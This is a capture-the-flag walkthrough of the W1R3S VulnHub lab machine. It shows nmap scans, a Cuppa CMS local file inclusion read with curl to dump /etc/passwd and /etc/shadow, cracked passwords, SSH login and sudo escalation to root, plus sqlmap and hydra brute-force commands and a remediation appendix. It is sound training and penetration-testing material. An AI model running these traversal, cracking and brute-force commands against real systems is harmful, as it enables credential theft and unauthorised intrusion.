W1R3S: 1.0.1 ~ VulnHub - CTF Walkthrough
Contents
Objective
You have been hired to do a penetration test on the W1R3S.inc individual server and report all findings. They have asked you to gain root access and find the flag (located in /root directory).
Source: [VulnHub.com]
Status: [In Progress]
Methodology
Discovery
root@blaksec:/ # export TANGO=192.168.56.101
root@blaksec:~/Desktop/w1r3s# nmap -O -sT -sV -p- -T5 $TANGO
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-26 19:01 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00093s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Entry Point #1 - Port 80 (HTTP)
Enumeration
A quick scan with dirb came back with two directories wordpress and administrator. The former runs the obvious - Word Press, the latter - CUPPA CMS
WordPress is configured to run under localhost so we need to update /etc/hosts
192.168.56.101 localhost
A quick checked of WordPress with wp-scan did not reveal anything interesting. Gut feel tells me to put that aside and move to CUPPA older versions of which, according to google, come with a LFI vulnerability.
Exploitation
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://localhost/administrator/alerts/alertConfigField.php |grep sbin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
......
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
And taking it a step further...
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://localhost/administrator/alerts/alertConfigField.php
...
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
...
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
...
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:999...
Didn't take long to crack the hashes with good old trusty john
root@blaksec:~/Desktop/w1r3s# john --show shadow.txt
w1r3s:computer
www-data:www-data
2 password hashes cracked, 1 left
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# ssh w1r3s@$TANGO
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:/3N0PzPMqtXlj9QWJFMbCufh2W95JylZ/oF82NkAAto.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@192.168.56.101's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
108 packages can be updated.
6 updates are security updates.
.....You made it huh?....
Last login: Sun Apr 1 14:38:25 2018 from 192.168.56.200
w1r3s@W1R3S:~$
w1r3s@W1R3S:~$ sudo -l
sudo: unable to resolve host W1R3S: Connection refused
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User w1r3s may run the following commands on W1R3S:
(ALL : ALL) ALL
w1r3s@W1R3S:~$ sudo /bin/bash
sudo: unable to resolve host W1R3S: Connection refused
root@W1R3S:~# cd /root
root@W1R3S:/root# ls
flag.txt
root@W1R3S:/root# cat flag.txt
-----------------------------------------------------------------------------------------
____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____
/ ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___|
| | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \
| |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) |
\____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/
-----------------------------------------------------------------------------------------
.-----------------TTTT_-----_______
/''''''''''(______O] ----------____ \______/]_
__...---'"""\_ --'' Q ___________@
|''' ._ _______________=---------"""""""
| ..--''| l L |_l |
| ..--'' . /-___j ' '
| ..--'' / , ' '
|--'' / ` \
L__' \ -
- '-.
'. /
'-./
----------------------------------------------------------------------------------------
YOU HAVE COMPLETED THE
__ __ ______________________ _________
/ \ / \/_ \______ \_____ \ / _____/
\ \/\/ / | || _/ _(__ < \_____ \
\ / | || | \/ \/ \
\__/\ / |___||____|_ /______ /_______ /.INC
\/ \/ \/ \/ CHALLENGE, V 1.0
----------------------------------------------------------------------------------------
CREATED BY SpecterWires
------------------------------------------------------------------------------
Final Notes
Lots of decoys! Some things I tried which did not work but might come handy one day:
Using nmap wordpress scripts
root@kali:~/Desktop/Bob:1# nmap -sV --script http-wordpress-enum -p 80 --script http-wordpress-users --script-args 'limit=5000,basepath=/wordpress/' 192.168.56.101
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-wordpress-users:
| Username found: joseph-g
|_Search stopped at ID #5000. Increase the upper limit if necessary with 'http-wordpress-users.limit'
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)
root@kali:~/Desktop/Bob:1# nmap -sV --script http-wordpress-enum -p 80 --script-args 'http-wordpress-enum.root=/wordpress,http-wordpress-enum.search-limit=all' 192.168.56.101
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-02 08:32 EDT
Nmap scan report for localhost (192.168.56.101)
Host is up (0.00024s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-wordpress-enum:
| Search limited to top 50546 themes/plugins
| themes
| twentyfifteen 1.9
| twentysixteen 1.4
| twentyseventeen 1.4nmap -O -sT -sV -p- -T5 192.168.56.101
| plugins
|_ akismet 4.0.2
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)
</syntaxhighlght>
Using '''sqlmap'''
<syntaxhighlight lang=shell-session highlight="" line>
sqlmap -u http://localhost/administrator/installation/ --dbms=mysql --data="host=localhost&db=asdf&user=root&password=asdf&table_prefix=cu_&name=Administrator&email=asdf%40mail.com&username=admin&username_password=admin&view=installation_finished" --dump users --level=5 --risk=3
Using hydra to bruteforce WP login
hydra -u -P /usr/share/wordlists/rockyou.txt -a admin 192.168.56.101 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=incorrect'
Appendix A: Vulnerability Detail and Mitigation
Rating | High |
Description | An outdated version of Cuppa CMS was found running on the server, exposed and accessible to the outside network. This version is known for it's Local File Inclusion vulnerability. |
Impact | An attacker can explore the vulnerability to gain access to various files on the local file system, including but not limited to /etc/passwd, /etc/shadow files, which contain user login information and user passwords. |
Remediation | Update Cuppa CMS software to the latest stable version. Additionally, set up system permissions in the way that critical system files like /etc/passwd are not accessible to the user used to run webserver processes. |
Rating | High |
Description | Two user accounts are configured with easy-to-guess dictionary-based passwords. |
Impact | An attacker would be able to easily compromise user accounts using dictionary attacks, which will enable them to log in to the host via ssh. |
Remediation | Implement stronger password policies enforcing proper password complexity, disallowing dictionary based passwords. Perform periodic audit of the passwords using tools like cracklib. |
Rating | Medium |
Description | Sudo role for user w1r3s allows for unrestricted access to execute any commands as root user. |
Impact | After gaining access to w13rs account, an attacker will be able to escalate their privileges, gaining access to the root shell. |
Remediation | Restrict sudo roles only to specific command. |